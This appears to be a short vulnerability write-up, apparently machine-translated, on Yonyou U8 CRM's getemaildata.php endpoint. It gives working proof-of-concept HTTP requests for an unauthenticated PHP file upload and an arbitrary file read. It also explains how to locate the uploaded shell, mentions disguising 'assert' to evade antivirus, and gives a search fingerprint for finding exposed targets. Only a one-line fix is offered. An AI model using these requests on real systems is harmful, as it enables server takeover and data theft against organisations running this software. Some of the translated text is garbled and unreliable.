0x01 Product Introduction
Yonyou U8 CRM customer relationship management system is a professional enterprise-level CRM software designed to help enterprises efficiently manage customer relationships, improve sales performance and provide high-quality customer service.
0x02 Vulnerability Overview
There are arbitrary file upload and arbitrary file read vulnerabilities in the getemaildata.php file of the U8 CRM customer relationship management system, through which attackers can obtain server permissions.
0x03 Recurrence environment
Intergraph fingerprint: web.body="U8CRM"
0x04 Vulnerability Reappearance
File Upload PoC
POST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.1
Host:your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykS5RKgl8t3nwInMQ
------WebKitFormBoundarykS5RKgl8t3nwInMQ
Content-Disposition: form-data; name="file"; filename="a.php "
Content-Type: text/plain
<?php phpinfo();?>
------WebKitFormBoundarykS5RKgl8t3nwInMQ
PS: The parsed file format to access is upd***.tmp.php, the asterisk part is the hexadecimal number of the returned file name minus one, for example in the picture above (without mht): 1022——>31303232( hexadecimal), 31303231 (hexadecimal minus one) --> 1021
verify url
http://your-ip/tmpfile/upd十六进制减一.tmp.php
upload
PS: Use the substr_replace() function to transform the assert to achieve the effect of avoiding killing
try to connect
File reading PoC
GET /ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini HTTP/1.1
Content-Type: application/json
Host: your-ip
0x05 Repair suggestion
Close the Internet access permission, and the file upload module has a strong authorization authentication.
Patch ASAP!